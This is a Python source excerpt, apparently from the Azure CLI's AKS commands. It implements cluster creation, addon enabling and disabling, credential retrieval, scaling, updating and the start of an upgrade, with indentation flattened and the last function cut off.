service_principal_msi_id = result.addon_profiles[CONST_INGRESS_APPGW_ADDON_NAME].identity.object_id
is_service_principal = False
if service_principal_msi_id is not None:
config = result.addon_profiles[CONST_INGRESS_APPGW_ADDON_NAME].config
from msrestazure.tools import parse_resource_id, resource_id
if CONST_INGRESS_APPGW_APPLICATION_GATEWAY_ID in config:
appgw_id = config[CONST_INGRESS_APPGW_APPLICATION_GATEWAY_ID]
parsed_appgw_id = parse_resource_id(appgw_id)
appgw_group_id = resource_id(subscription=parsed_appgw_id["subscription"],
resource_group=parsed_appgw_id["resource_group"])
if not _add_role_assignment(cmd.cli_ctx, 'Contributor',
service_principal_msi_id, is_service_principal, scope=appgw_group_id):
logger.warning('Could not create a role assignment for application gateway: %s '
'specified in %s addon. '
'Are you an Owner on this subscription?', appgw_id, CONST_INGRESS_APPGW_ADDON_NAME)
if CONST_INGRESS_APPGW_SUBNET_ID in config:
subnet_id = config[CONST_INGRESS_APPGW_SUBNET_ID]
if not _add_role_assignment(cmd.cli_ctx, 'Network Contributor',
service_principal_msi_id, is_service_principal, scope=subnet_id):
logger.warning('Could not create a role assignment for subnet: %s '
'specified in %s addon. '
'Are you an Owner on this subscription?', subnet_id, CONST_INGRESS_APPGW_ADDON_NAME)
if CONST_INGRESS_APPGW_SUBNET_CIDR in config:
if result.agent_pool_profiles[0].vnet_subnet_id is not None:
parsed_subnet_vnet_id = parse_resource_id(result.agent_pool_profiles[0].vnet_subnet_id)
vnet_id = resource_id(subscription=parsed_subnet_vnet_id["subscription"],
resource_group=parsed_subnet_vnet_id["resource_group"],
namespace="Microsoft.Network",
type="virtualNetworks",
name=parsed_subnet_vnet_id["name"])
if not _add_role_assignment(cmd.cli_ctx, 'Contributor',
service_principal_msi_id, is_service_principal, scope=vnet_id):
logger.warning('Could not create a role assignment for virtual network: %s '
'specified in %s addon. '
'Are you an Owner on this subscription?', vnet_id, CONST_INGRESS_APPGW_ADDON_NAME)
def _add_virtual_node_role_assignment(cmd, result, vnet_subnet_id):
# Remove trailing "/subnets/<SUBNET_NAME>" to get the vnet id
vnet_id = vnet_subnet_id.rpartition('/')[0]
vnet_id = vnet_id.rpartition('/')[0]
service_principal_msi_id = None
is_service_principal = False
os_type = 'Linux'
addon_name = CONST_VIRTUAL_NODE_ADDON_NAME + os_type
# Check if service principal exists, if it does, assign permissions to service principal
# Else, provide permissions to MSI
if (
hasattr(result, 'service_principal_profile') and
hasattr(result.service_principal_profile, 'client_id') and
result.service_principal_profile.client_id.lower() != 'msi'
):
logger.info('valid service principal exists, using it')
service_principal_msi_id = result.service_principal_profile.client_id
is_service_principal = True
elif (
(hasattr(result, 'addon_profiles')) and
(addon_name in result.addon_profiles) and
(hasattr(result.addon_profiles[addon_name], 'identity')) and
(hasattr(result.addon_profiles[addon_name].identity, 'object_id'))
):
logger.info('virtual node MSI exists, using it')
service_principal_msi_id = result.addon_profiles[addon_name].identity.object_id
is_service_principal = False
if service_principal_msi_id is not None:
if not _add_role_assignment(cmd.cli_ctx, 'Contributor',
service_principal_msi_id, is_service_principal, scope=vnet_id):
logger.warning('Could not create a role assignment for virtual node addon. '
'Are you an Owner on this subscription?')
else:
        logger.warning('Could not find service principal or user assigned MSI for role '
                       'assignment')
# pylint: disable=too-many-statements,too-many-branches
def aks_create(cmd, client, resource_group_name, name, ssh_key_value, # pylint: disable=too-many-locals
dns_name_prefix=None,
location=None,
admin_username="azureuser",
windows_admin_username=None,
windows_admin_password=None,
enable_ahub=False,
kubernetes_version='',
node_vm_size="Standard_DS2_v2",
node_osdisk_type=None,
node_osdisk_size=0,
node_osdisk_diskencryptionset_id=None,
node_count=3,
nodepool_name="nodepool1",
nodepool_tags=None,
nodepool_labels=None,
service_principal=None, client_secret=None,
no_ssh_key=False,
disable_rbac=None,
enable_rbac=None,
vm_set_type=None,
skip_subnet_role_assignment=False,
enable_cluster_autoscaler=False,
cluster_autoscaler_profile=None,
network_plugin=None,
network_policy=None,
uptime_sla=False,
pod_cidr=None,
service_cidr=None,
dns_service_ip=None,
docker_bridge_address=None,
load_balancer_sku=None,
load_balancer_managed_outbound_ip_count=None,
load_balancer_outbound_ips=None,
load_balancer_outbound_ip_prefixes=None,
load_balancer_outbound_ports=None,
load_balancer_idle_timeout=None,
outbound_type=None,
enable_addons=None,
workspace_resource_id=None,
vnet_subnet_id=None,
ppg=None,
max_pods=0,
min_count=None,
max_count=None,
aad_client_app_id=None,
aad_server_app_id=None,
aad_server_app_secret=None,
aad_tenant_id=None,
tags=None,
zones=None,
enable_node_public_ip=False,
generate_ssh_keys=False, # pylint: disable=unused-argument
api_server_authorized_ip_ranges=None,
enable_private_cluster=False,
enable_managed_identity=True,
assign_identity=None,
attach_acr=None,
enable_aad=False,
aad_admin_group_object_ids=None,
aci_subnet_name=None,
appgw_name=None,
appgw_subnet_cidr=None,
appgw_id=None,
appgw_subnet_id=None,
appgw_watch_namespace=None,
enable_sgxquotehelper=False,
no_wait=False,
yes=False):
_validate_ssh_key(no_ssh_key, ssh_key_value)
subscription_id = get_subscription_id(cmd.cli_ctx)
if not dns_name_prefix:
dns_name_prefix = _get_default_dns_prefix(name, resource_group_name, subscription_id)
rg_location = _get_rg_location(cmd.cli_ctx, resource_group_name)
if location is None:
location = rg_location
vm_set_type = _set_vm_set_type(vm_set_type, kubernetes_version)
load_balancer_sku = set_load_balancer_sku(load_balancer_sku, kubernetes_version)
if api_server_authorized_ip_ranges and load_balancer_sku == "basic":
raise CLIError('--api-server-authorized-ip-ranges can only be used with standard load balancer')
agent_pool_profile = ManagedClusterAgentPoolProfile(
name=_trim_nodepoolname(nodepool_name), # Must be 12 chars or less before ACS RP adds to it
tags=nodepool_tags,
node_labels=nodepool_labels,
count=int(node_count),
vm_size=node_vm_size,
os_type="Linux",
vnet_subnet_id=vnet_subnet_id,
proximity_placement_group_id=ppg,
availability_zones=zones,
enable_node_public_ip=enable_node_public_ip,
max_pods=int(max_pods) if max_pods else None,
type=vm_set_type,
mode="System"
)
if node_osdisk_size:
agent_pool_profile.os_disk_size_gb = int(node_osdisk_size)
if node_osdisk_type:
agent_pool_profile.os_disk_type = node_osdisk_type
_check_cluster_autoscaler_flag(enable_cluster_autoscaler, min_count, max_count, node_count, agent_pool_profile)
linux_profile = None
# LinuxProfile is just used for SSH access to VMs, so omit it if --no-ssh-key was specified.
if not no_ssh_key:
ssh_config = ContainerServiceSshConfiguration(
public_keys=[ContainerServiceSshPublicKey(key_data=ssh_key_value)])
linux_profile = ContainerServiceLinuxProfile(admin_username=admin_username, ssh=ssh_config)
windows_profile = None
if windows_admin_username or windows_admin_password:
        # Handle the case where windows_admin_password is set but windows_admin_username is not
if windows_admin_username is None:
try:
from knack.prompting import prompt
windows_admin_username = prompt('windows_admin_username: ')
                # Validation of admin_username in ManagedClusterWindowsProfile will still fail
                # if the user enters an empty windows_admin_username here
except NoTTYException:
raise CLIError('Please specify username for Windows in non-interactive mode.')
if windows_admin_password is None:
try:
windows_admin_password = prompt_pass(
msg='windows-admin-password: ', confirm=True)
except NoTTYException:
raise CLIError(
'Please specify both username and password in non-interactive mode.')
windows_license_type = None
if enable_ahub:
windows_license_type = 'Windows_Server'
windows_profile = ManagedClusterWindowsProfile(
admin_username=windows_admin_username,
admin_password=windows_admin_password,
license_type=windows_license_type)
    # If the customer explicitly provides a service principal, disable managed identity.
if service_principal and client_secret:
enable_managed_identity = False
    # Skip creating a service principal profile for the cluster if the cluster
    # uses managed identity and the customer doesn't explicitly provide a service principal.
service_principal_profile = None
principal_obj = None
    if not (enable_managed_identity and not service_principal and not client_secret):
principal_obj = _ensure_aks_service_principal(cmd.cli_ctx,
service_principal=service_principal, client_secret=client_secret,
subscription_id=subscription_id, dns_name_prefix=dns_name_prefix,
location=location, name=name)
service_principal_profile = ManagedClusterServicePrincipalProfile(
client_id=principal_obj.get("service_principal"),
secret=principal_obj.get("client_secret"),
key_vault_secret_ref=None)
need_post_creation_vnet_permission_granting = False
if (vnet_subnet_id and not skip_subnet_role_assignment and
not subnet_role_assignment_exists(cmd.cli_ctx, vnet_subnet_id)):
        # If service_principal_profile is None, then this cluster is an MSI cluster,
        # and the service principal does not exist. Two cases:
        # 1. For system assigned identity, we just tell the user to grant the permission
        #    after the cluster is created, to stay consistent with the portal experience.
        # 2. For user assigned identity, we can grant the needed permission to the
        #    user-provided user-assigned identity before creating the managed cluster.
if service_principal_profile is None and not assign_identity:
msg = ('It is highly recommended to use USER assigned identity '
                   '(option --assign-identity) when you want to bring your own '
'subnet, which will have no latency for the role assignment to '
'take effect. When using SYSTEM assigned identity, '
'azure-cli will grant Network Contributor role to the '
'system assigned identity after the cluster is created, and '
'the role assignment will take some time to take effect, see '
'https://docs.microsoft.com/en-us/azure/aks/use-managed-identity, '
'proceed to create cluster with system assigned identity?')
if not yes and not prompt_y_n(msg, default="n"):
return None
need_post_creation_vnet_permission_granting = True
else:
scope = vnet_subnet_id
identity_client_id = ""
if assign_identity:
identity_client_id = _get_user_assigned_identity_client_id(cmd.cli_ctx, assign_identity)
else:
identity_client_id = service_principal_profile.client_id
if not _add_role_assignment(cmd.cli_ctx, 'Network Contributor',
identity_client_id, scope=scope):
logger.warning('Could not create a role assignment for subnet. '
'Are you an Owner on this subscription?')
load_balancer_profile = create_load_balancer_profile(
load_balancer_managed_outbound_ip_count,
load_balancer_outbound_ips,
load_balancer_outbound_ip_prefixes,
load_balancer_outbound_ports,
load_balancer_idle_timeout)
if attach_acr:
if enable_managed_identity:
if no_wait:
raise CLIError('When --attach-acr and --enable-managed-identity are both specified, '
'--no-wait is not allowed, please wait until the whole operation succeeds.')
            # The attach-acr operation will be handled after the cluster is created
else:
_ensure_aks_acr(cmd.cli_ctx,
client_id=service_principal_profile.client_id,
acr_name_or_id=attach_acr,
subscription_id=subscription_id)
outbound_type = _set_outbound_type(outbound_type, vnet_subnet_id, load_balancer_sku, load_balancer_profile)
network_profile = None
if any([network_plugin, pod_cidr, service_cidr, dns_service_ip,
docker_bridge_address, network_policy]):
if not network_plugin:
raise CLIError('Please explicitly specify the network plugin type')
if pod_cidr and network_plugin == "azure":
raise CLIError('Please use kubenet as the network plugin type when pod_cidr is specified')
network_profile = ContainerServiceNetworkProfile(
network_plugin=network_plugin,
pod_cidr=pod_cidr,
service_cidr=service_cidr,
dns_service_ip=dns_service_ip,
docker_bridge_cidr=docker_bridge_address,
network_policy=network_policy,
load_balancer_sku=load_balancer_sku.lower(),
load_balancer_profile=load_balancer_profile,
outbound_type=outbound_type
)
else:
if load_balancer_sku.lower() == "standard" or load_balancer_profile:
network_profile = ContainerServiceNetworkProfile(
network_plugin="kubenet",
load_balancer_sku=load_balancer_sku.lower(),
load_balancer_profile=load_balancer_profile,
outbound_type=outbound_type,
)
if load_balancer_sku.lower() == "basic":
network_profile = ContainerServiceNetworkProfile(
load_balancer_sku=load_balancer_sku.lower(),
)
addon_profiles = _handle_addons_args(
cmd,
enable_addons,
subscription_id,
resource_group_name,
{},
workspace_resource_id,
aci_subnet_name,
vnet_subnet_id,
appgw_name,
appgw_subnet_cidr,
appgw_id,
appgw_subnet_id,
appgw_watch_namespace,
enable_sgxquotehelper
)
monitoring = False
if CONST_MONITORING_ADDON_NAME in addon_profiles:
monitoring = True
_ensure_container_insights_for_monitoring(cmd, addon_profiles[CONST_MONITORING_ADDON_NAME])
# addon is in the list and is enabled
ingress_appgw_addon_enabled = CONST_INGRESS_APPGW_ADDON_NAME in addon_profiles and \
addon_profiles[CONST_INGRESS_APPGW_ADDON_NAME].enabled
os_type = 'Linux'
enable_virtual_node = False
if CONST_VIRTUAL_NODE_ADDON_NAME + os_type in addon_profiles:
enable_virtual_node = True
aad_profile = None
if enable_aad:
if any([aad_client_app_id, aad_server_app_id, aad_server_app_secret]):
raise CLIError('"--enable-aad" cannot be used together with '
'"--aad-client-app-id/--aad-server-app-id/--aad-server-app-secret"')
aad_profile = ManagedClusterAADProfile(
managed=True,
admin_group_object_ids=_parse_comma_separated_list(aad_admin_group_object_ids),
tenant_id=aad_tenant_id
)
else:
if any([aad_client_app_id, aad_server_app_id, aad_server_app_secret, aad_tenant_id]):
if aad_tenant_id is None:
profile = Profile(cli_ctx=cmd.cli_ctx)
_, _, aad_tenant_id = profile.get_login_credentials()
aad_profile = ManagedClusterAADProfile(
client_app_id=aad_client_app_id,
server_app_id=aad_server_app_id,
server_app_secret=aad_server_app_secret,
tenant_id=aad_tenant_id
)
api_server_access_profile = None
if enable_private_cluster and load_balancer_sku.lower() != "standard":
raise CLIError("Please use standard load balancer for private cluster")
if api_server_authorized_ip_ranges or enable_private_cluster:
api_server_access_profile = _populate_api_server_access_profile(
api_server_authorized_ip_ranges,
enable_private_cluster=enable_private_cluster
)
# Check that both --disable-rbac and --enable-rbac weren't provided
if all([disable_rbac, enable_rbac]):
raise CLIError('specify either "--disable-rbac" or "--enable-rbac", not both.')
identity = None
if not enable_managed_identity and assign_identity:
raise ArgumentUsageError('--assign-identity can only be specified when --enable-managed-identity is specified')
if enable_managed_identity and not assign_identity:
identity = ManagedClusterIdentity(
type="SystemAssigned"
)
elif enable_managed_identity and assign_identity:
user_assigned_identity = {
assign_identity: ManagedClusterIdentityUserAssignedIdentitiesValue()
}
identity = ManagedClusterIdentity(
type="UserAssigned",
user_assigned_identities=user_assigned_identity
)
mc = ManagedCluster(
location=location,
tags=tags,
dns_prefix=dns_name_prefix,
kubernetes_version=kubernetes_version,
enable_rbac=not disable_rbac,
agent_pool_profiles=[agent_pool_profile],
linux_profile=linux_profile,
windows_profile=windows_profile,
service_principal_profile=service_principal_profile,
network_profile=network_profile,
addon_profiles=addon_profiles,
aad_profile=aad_profile,
auto_scaler_profile=cluster_autoscaler_profile,
api_server_access_profile=api_server_access_profile,
identity=identity,
disk_encryption_set_id=node_osdisk_diskencryptionset_id
)
if uptime_sla:
mc.sku = ManagedClusterSKU(
name="Basic",
tier="Paid"
)
    # Add the AAD session key to the request header.
    # If principal_obj is None, we do not add this header; this can happen when the
    # cluster uses managed identity. In that case the header is not needed, so it is
    # fine to omit it.
custom_headers = None
if principal_obj:
custom_headers = {'Ocp-Aad-Session-Key': principal_obj.get("aad_session_key")}
# Due to SPN replication latency, we do a few retries here
max_retry = 30
retry_exception = Exception(None)
for _ in range(0, max_retry):
try:
need_pull_for_result = (monitoring or
(enable_managed_identity and attach_acr) or
ingress_appgw_addon_enabled or
enable_virtual_node or
need_post_creation_vnet_permission_granting)
if need_pull_for_result:
# adding a wait here since we rely on the result for role assignment
result = LongRunningOperation(cmd.cli_ctx)(client.create_or_update(
resource_group_name=resource_group_name,
resource_name=name,
parameters=mc))
else:
result = sdk_no_wait(no_wait,
client.create_or_update,
resource_group_name=resource_group_name,
resource_name=name,
parameters=mc,
custom_headers=custom_headers)
if monitoring:
cloud_name = cmd.cli_ctx.cloud.name
                # add cluster spn/msi Monitoring Metrics Publisher role assignment to publish metrics to MDM
                # MDM metrics are supported only in the Azure public cloud, so add the role assignment only there
if cloud_name.lower() == 'azurecloud':
from msrestazure.tools import resource_id
cluster_resource_id = resource_id(
subscription=subscription_id,
resource_group=resource_group_name,
namespace='Microsoft.ContainerService', type='managedClusters',
name=name
)
_add_monitoring_role_assignment(result, cluster_resource_id, cmd)
if enable_managed_identity and attach_acr:
if result.identity_profile is None or result.identity_profile["kubeletidentity"] is None:
                    logger.warning('Your cluster is successfully created, but we failed to attach ACR to it. '
                                   'You can manually grant permission to the identity named <CLUSTER_NAME>-agentpool '
                                   'in the MC_ resource group to give it permission to pull from ACR.')
else:
kubelet_identity_client_id = result.identity_profile["kubeletidentity"].client_id
_ensure_aks_acr(cmd.cli_ctx,
client_id=kubelet_identity_client_id,
acr_name_or_id=attach_acr,
subscription_id=subscription_id)
if ingress_appgw_addon_enabled:
_add_ingress_appgw_addon_role_assignment(result, cmd)
if enable_virtual_node:
_add_virtual_node_role_assignment(cmd, result, vnet_subnet_id)
if need_post_creation_vnet_permission_granting:
if not _create_role_assignment(cmd.cli_ctx, 'Network Contributor',
result.identity.principal_id, scope=vnet_subnet_id,
resolve_assignee=False):
logger.warning('Could not create a role assignment for subnet. '
'Are you an Owner on this subscription?')
return result
except CloudError as ex:
retry_exception = ex
if 'not found in Active Directory tenant' in ex.message:
time.sleep(3)
else:
raise ex
raise retry_exception
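# Illustrative invocation of the command backed by aks_create (resource names are hypothetical,
# and only a small subset of the supported flags is shown):
#   az aks create -g myResourceGroup -n myAKSCluster --node-count 3 \
#       --enable-managed-identity --enable-addons monitoring --generate-ssh-keys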
def aks_disable_addons(cmd, client, resource_group_name, name, addons, no_wait=False):
instance = client.get(resource_group_name, name)
subscription_id = get_subscription_id(cmd.cli_ctx)
instance = _update_addons(
cmd,
instance,
subscription_id,
resource_group_name,
name,
addons,
enable=False,
no_wait=no_wait
)
# send the managed cluster representation to update the addon profiles
return sdk_no_wait(no_wait, client.create_or_update, resource_group_name, name, instance)
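# Illustrative invocation (hypothetical names):
#   az aks disable-addons -a monitoring -g myResourceGroup -n myAKSCluster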
def aks_enable_addons(cmd, client, resource_group_name, name, addons,
workspace_resource_id=None,
subnet_name=None,
appgw_name=None,
appgw_subnet_cidr=None,
appgw_id=None,
appgw_subnet_id=None,
appgw_watch_namespace=None,
enable_sgxquotehelper=False,
no_wait=False):
instance = client.get(resource_group_name, name)
subscription_id = get_subscription_id(cmd.cli_ctx)
instance = _update_addons(cmd, instance, subscription_id, resource_group_name, name, addons, enable=True,
workspace_resource_id=workspace_resource_id,
subnet_name=subnet_name,
appgw_name=appgw_name,
appgw_subnet_cidr=appgw_subnet_cidr,
appgw_id=appgw_id,
appgw_subnet_id=appgw_subnet_id,
appgw_watch_namespace=appgw_watch_namespace,
enable_sgxquotehelper=enable_sgxquotehelper,
no_wait=no_wait)
enable_monitoring = CONST_MONITORING_ADDON_NAME in instance.addon_profiles \
and instance.addon_profiles[CONST_MONITORING_ADDON_NAME].enabled
ingress_appgw_addon_enabled = CONST_INGRESS_APPGW_ADDON_NAME in instance.addon_profiles \
and instance.addon_profiles[CONST_INGRESS_APPGW_ADDON_NAME].enabled
os_type = 'Linux'
virtual_node_addon_name = CONST_VIRTUAL_NODE_ADDON_NAME + os_type
enable_virtual_node = (virtual_node_addon_name in instance.addon_profiles and
instance.addon_profiles[virtual_node_addon_name].enabled)
need_pull_for_result = enable_monitoring or ingress_appgw_addon_enabled or enable_virtual_node
if need_pull_for_result:
if enable_monitoring:
_ensure_container_insights_for_monitoring(cmd, instance.addon_profiles[CONST_MONITORING_ADDON_NAME])
# adding a wait here since we rely on the result for role assignment
result = LongRunningOperation(cmd.cli_ctx)(client.create_or_update(resource_group_name, name, instance))
if enable_monitoring:
cloud_name = cmd.cli_ctx.cloud.name
# mdm metrics supported only in Azure Public cloud so add the role assignment only in this cloud
if cloud_name.lower() == 'azurecloud':
from msrestazure.tools import resource_id
cluster_resource_id = resource_id(
subscription=subscription_id,
resource_group=resource_group_name,
namespace='Microsoft.ContainerService', type='managedClusters',
name=name
)
_add_monitoring_role_assignment(result, cluster_resource_id, cmd)
if ingress_appgw_addon_enabled:
_add_ingress_appgw_addon_role_assignment(result, cmd)
if enable_virtual_node:
            # All agent pools reside in the same vnet; a later function grants the vnet-level
            # Contributor role, so using any agent pool here is fine
random_agent_pool = result.agent_pool_profiles[0]
if random_agent_pool.vnet_subnet_id != "":
_add_virtual_node_role_assignment(cmd, result, random_agent_pool.vnet_subnet_id)
            # Otherwise the cluster is not using a custom VNet; the permission is already
            # granted in the AKS RP, so there is nothing to handle on the client side.
else:
result = sdk_no_wait(no_wait, client.create_or_update,
resource_group_name, name, instance)
return result
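# Illustrative invocation (hypothetical names): enable the monitoring addon against an existing
# Log Analytics workspace; without --workspace-resource-id a default workspace is created or
# reused, as handled in _update_addons below.
#   az aks enable-addons -a monitoring -g myResourceGroup -n myAKSCluster \
#       --workspace-resource-id <log-analytics-workspace-resource-id>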
def aks_get_versions(cmd, client, location):
return client.list_orchestrators(location, resource_type='managedClusters')
def aks_get_credentials(cmd, client, resource_group_name, name, admin=False,
path=os.path.join(os.path.expanduser('~'), '.kube', 'config'),
overwrite_existing=False, context_name=None):
credentialResults = None
if admin:
credentialResults = client.list_cluster_admin_credentials(resource_group_name, name)
else:
credentialResults = client.list_cluster_user_credentials(resource_group_name, name)
if not credentialResults:
raise CLIError("No Kubernetes credentials found.")
try:
kubeconfig = credentialResults.kubeconfigs[0].value.decode(encoding='UTF-8')
_print_or_merge_credentials(path, kubeconfig, overwrite_existing, context_name)
except (IndexError, ValueError):
        raise CLIError("Failed to find the kubeconfig file.")
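# Illustrative invocation (hypothetical names): merge the user kubeconfig into the default
# path (~/.kube/config); pass --admin to fetch cluster-admin credentials instead.
#   az aks get-credentials -g myResourceGroup -n myAKSCluster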
def aks_list(cmd, client, resource_group_name=None):
if resource_group_name:
managed_clusters = client.list_by_resource_group(resource_group_name)
else:
managed_clusters = client.list()
return _remove_nulls(list(managed_clusters))
def aks_show(cmd, client, resource_group_name, name):
mc = client.get(resource_group_name, name)
return _remove_nulls([mc])[0]
def aks_update_credentials(cmd, client, resource_group_name, name,
reset_service_principal=False,
reset_aad=False,
service_principal=None,
client_secret=None,
aad_server_app_id=None,
aad_server_app_secret=None,
aad_client_app_id=None,
aad_tenant_id=None,
no_wait=False):
if bool(reset_service_principal) == bool(reset_aad):
raise CLIError('usage error: --reset-service-principal | --reset-aad-profile')
if reset_service_principal:
if service_principal is None or client_secret is None:
raise CLIError('usage error: --reset-service-principal --service-principal ID --client-secret SECRET')
return sdk_no_wait(no_wait,
client.reset_service_principal_profile,
resource_group_name,
name, service_principal, client_secret)
if not all([aad_client_app_id, aad_server_app_id, aad_server_app_secret]):
raise CLIError('usage error: --reset-aad --aad-client-app-id ID --aad-server-app-id ID '
'--aad-server-app-secret SECRET [--aad-tenant-id ID]')
parameters = {
'clientAppID': aad_client_app_id,
'serverAppID': aad_server_app_id,
'serverAppSecret': aad_server_app_secret,
'tenantID': aad_tenant_id
}
return sdk_no_wait(no_wait,
client.reset_aad_profile,
resource_group_name,
name, parameters)
def aks_scale(cmd, client, resource_group_name, name, node_count, nodepool_name="", no_wait=False):
instance = client.get(resource_group_name, name)
if len(instance.agent_pool_profiles) > 1 and nodepool_name == "":
        raise CLIError('There is more than one node pool in the cluster. '
                       'Please specify a node pool name or use the "az aks nodepool" command to scale a node pool.')
for agent_profile in instance.agent_pool_profiles:
if agent_profile.name == nodepool_name or (nodepool_name == "" and len(instance.agent_pool_profiles) == 1):
if agent_profile.enable_auto_scaling:
raise CLIError("Cannot scale cluster autoscaler enabled node pool.")
agent_profile.count = int(node_count) # pylint: disable=no-member
# null out the SP and AAD profile because otherwise validation complains
instance.service_principal_profile = None
instance.aad_profile = None
return sdk_no_wait(no_wait, client.create_or_update, resource_group_name, name, instance)
raise CLIError('The nodepool "{}" was not found.'.format(nodepool_name))
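# Illustrative invocation (hypothetical names): scale the only node pool to 5 nodes; when the
# cluster has more than one node pool, --nodepool-name must be supplied, as enforced above.
#   az aks scale -g myResourceGroup -n myAKSCluster --node-count 5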
# pylint: disable=inconsistent-return-statements
def aks_update(cmd, client, resource_group_name, name,
enable_cluster_autoscaler=False,
disable_cluster_autoscaler=False,
update_cluster_autoscaler=False,
cluster_autoscaler_profile=None,
min_count=None, max_count=None,
uptime_sla=False,
load_balancer_managed_outbound_ip_count=None,
load_balancer_outbound_ips=None,
load_balancer_outbound_ip_prefixes=None,
load_balancer_outbound_ports=None,
load_balancer_idle_timeout=None,
attach_acr=None,
detach_acr=None,
api_server_authorized_ip_ranges=None,
enable_aad=False,
aad_tenant_id=None,
aad_admin_group_object_ids=None,
enable_ahub=False,
disable_ahub=False,
no_wait=False):
update_autoscaler = enable_cluster_autoscaler + disable_cluster_autoscaler + update_cluster_autoscaler
update_lb_profile = is_load_balancer_profile_provided(load_balancer_managed_outbound_ip_count,
load_balancer_outbound_ips,
load_balancer_outbound_ip_prefixes,
load_balancer_outbound_ports,
load_balancer_idle_timeout)
update_aad_profile = not (aad_tenant_id is None and aad_admin_group_object_ids is None)
# pylint: disable=too-many-boolean-expressions
if (update_autoscaler != 1 and cluster_autoscaler_profile is None and
not update_lb_profile and
not attach_acr and
not detach_acr and
not uptime_sla and
api_server_authorized_ip_ranges is None and
not enable_aad and
not update_aad_profile and
not enable_ahub and
not disable_ahub):
        raise CLIError('Please specify one or more of "--enable-cluster-autoscaler" or '
                       '"--disable-cluster-autoscaler" or '
                       '"--update-cluster-autoscaler" or '
                       '"--cluster-autoscaler-profile" or '
                       '"--load-balancer-managed-outbound-ip-count" or '
                       '"--load-balancer-outbound-ips" or '
                       '"--load-balancer-outbound-ip-prefixes" or '
                       '"--load-balancer-outbound-ports" or '
                       '"--load-balancer-idle-timeout" or '
                       '"--attach-acr" or "--detach-acr" or '
                       '"--uptime-sla" or '
'"--api-server-authorized-ip-ranges" or '
'"--enable-aad" or '
'"--aad-tenant-id" or '
'"--aad-admin-group-object-ids" or '
'"--enable-ahub" or '
'"--disable-ahub"')
instance = client.get(resource_group_name, name)
# For multi-agent pool, use the az aks nodepool command
if update_autoscaler > 0 and len(instance.agent_pool_profiles) > 1:
        raise CLIError('There is more than one node pool in the cluster. Please use the "az aks nodepool" command '
                       'to update per-node-pool autoscaler settings.')
_validate_autoscaler_update_counts(min_count, max_count, enable_cluster_autoscaler or
update_cluster_autoscaler)
if enable_cluster_autoscaler:
if instance.agent_pool_profiles[0].enable_auto_scaling:
logger.warning('Cluster autoscaler is already enabled for this node pool.\n'
                           'Please run "az aks update --update-cluster-autoscaler" '
'if you want to update min-count or max-count.')
return None
instance.agent_pool_profiles[0].min_count = int(min_count)
instance.agent_pool_profiles[0].max_count = int(max_count)
instance.agent_pool_profiles[0].enable_auto_scaling = True
if update_cluster_autoscaler:
if not instance.agent_pool_profiles[0].enable_auto_scaling:
raise CLIError('Cluster autoscaler is not enabled for this node pool.\n'
'Run "az aks nodepool update --enable-cluster-autoscaler" '
                           'to enable the cluster autoscaler with min-count and max-count.')
instance.agent_pool_profiles[0].min_count = int(min_count)
instance.agent_pool_profiles[0].max_count = int(max_count)
if disable_cluster_autoscaler:
if not instance.agent_pool_profiles[0].enable_auto_scaling:
logger.warning('Cluster autoscaler is already disabled for this node pool.')
return None
instance.agent_pool_profiles[0].enable_auto_scaling = False
instance.agent_pool_profiles[0].min_count = None
instance.agent_pool_profiles[0].max_count = None
# if intention is to clear autoscaler profile
if cluster_autoscaler_profile == {}:
instance.auto_scaler_profile = {}
# else profile is provided, update instance profile if it exists
elif cluster_autoscaler_profile:
instance.auto_scaler_profile = _update_dict(instance.auto_scaler_profile.__dict__,
dict((key.replace("-", "_"), value)
for (key, value) in cluster_autoscaler_profile.items())) \
if instance.auto_scaler_profile else cluster_autoscaler_profile
subscription_id = get_subscription_id(cmd.cli_ctx)
client_id = ""
if instance.identity is not None and instance.identity.type == "SystemAssigned":
if instance.identity_profile is None or instance.identity_profile["kubeletidentity"] is None:
raise CLIError('Unexpected error getting kubelet\'s identity for the cluster. '
'Please do not set --attach-acr or --detach-acr. '
'You can manually grant or revoke permission to the identity named '
                           '<CLUSTER_NAME>-agentpool in the MC_ resource group to access ACR.')
client_id = instance.identity_profile["kubeletidentity"].client_id
else:
client_id = instance.service_principal_profile.client_id
if not client_id:
raise CLIError('Cannot get the AKS cluster\'s service principal.')
if attach_acr:
_ensure_aks_acr(cmd.cli_ctx,
client_id=client_id,
acr_name_or_id=attach_acr,
subscription_id=subscription_id)
if detach_acr:
_ensure_aks_acr(cmd.cli_ctx,
client_id=client_id,
acr_name_or_id=detach_acr,
subscription_id=subscription_id,
detach=True)
if uptime_sla:
instance.sku = ManagedClusterSKU(
name="Basic",
tier="Paid"
)
if update_lb_profile:
instance.network_profile.load_balancer_profile = update_load_balancer_profile(
load_balancer_managed_outbound_ip_count,
load_balancer_outbound_ips,
load_balancer_outbound_ip_prefixes,
load_balancer_outbound_ports,
load_balancer_idle_timeout,
instance.network_profile.load_balancer_profile)
# empty string is valid as it disables ip whitelisting
if api_server_authorized_ip_ranges is not None:
instance.api_server_access_profile = \
_populate_api_server_access_profile(api_server_authorized_ip_ranges, instance=instance)
if enable_aad:
if instance.aad_profile is not None and instance.aad_profile.managed:
raise CLIError('Cannot specify "--enable-aad" if managed AAD is already enabled')
instance.aad_profile = ManagedClusterAADProfile(
managed=True
)
if update_aad_profile:
if instance.aad_profile is None or not instance.aad_profile.managed:
raise CLIError('Cannot specify "--aad-tenant-id/--aad-admin-group-object-ids"'
' if managed AAD is not enabled')
if aad_tenant_id is not None:
instance.aad_profile.tenant_id = aad_tenant_id
if aad_admin_group_object_ids is not None:
instance.aad_profile.admin_group_object_ids = _parse_comma_separated_list(aad_admin_group_object_ids)
if enable_ahub and disable_ahub:
raise CLIError('Cannot specify "--enable-ahub" and "--disable-ahub" at the same time')
if enable_ahub:
instance.windows_profile.license_type = 'Windows_Server'
if disable_ahub:
instance.windows_profile.license_type = 'None'
return sdk_no_wait(no_wait, client.create_or_update, resource_group_name, name, instance)
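# Illustrative invocation (hypothetical names): turn on the cluster autoscaler for a
# single-node-pool cluster.
#   az aks update -g myResourceGroup -n myAKSCluster \
#       --enable-cluster-autoscaler --min-count 1 --max-count 5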
# pylint: disable=unused-argument,inconsistent-return-statements,too-many-return-statements
def aks_upgrade(cmd,
client,
resource_group_name, name,
kubernetes_version='',
control_plane_only=False,
node_image_only=False,
no_wait=False,
yes=False):
msg = 'Kubernetes may be unavailable during cluster upgrades.\n Are you sure you want to perform this operation?'
if not yes and not prompt_y_n(msg, default="n"):
return None
instance = client.get(resource_group_name, name)
vmas_cluster = False
for agent_profile in instance.agent_pool_profiles:
if agent_profile.type.lower() == "availabilityset":
vmas_cluster = True
